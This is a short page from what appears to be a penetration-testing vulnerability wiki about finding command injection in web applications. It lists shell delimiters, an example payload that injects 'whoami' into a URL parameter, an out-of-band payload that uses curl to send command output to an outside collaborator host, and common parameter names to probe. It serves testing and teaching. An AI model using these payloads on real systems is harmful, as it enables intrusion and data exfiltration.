Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Command Injection

POC

We can inject some special characters to see if the application blocks anything that could be used for command injection: - & - ; - Newline (0x0a or \n) - && - | - ||

In case the application doesn’t throw any error messages, we can try injecting our command after using one of these delimiters.

https://vulnerable-website/endpoint?parameter=1|whoami

Observe that the parameter parses the command you inject http://targetsite?id=blahblah;curl+$(whoami).xxxxx.burpcollaborator.net/

Note: This is a broad concept, above payload is just an example

The most common parameters that can be consider while testing for Command injection can be found below:

  • cmd
  • exec
  • command
  • execute
  • ping
  • query
  • jump
  • code
  • reg
  • do
  • func
  • arg
  • option
  • load
  • process
  • step
  • read
  • function
  • req
  • feature
  • exe
  • module
  • payload
  • run
  • print

Impact

High

Likelihood

High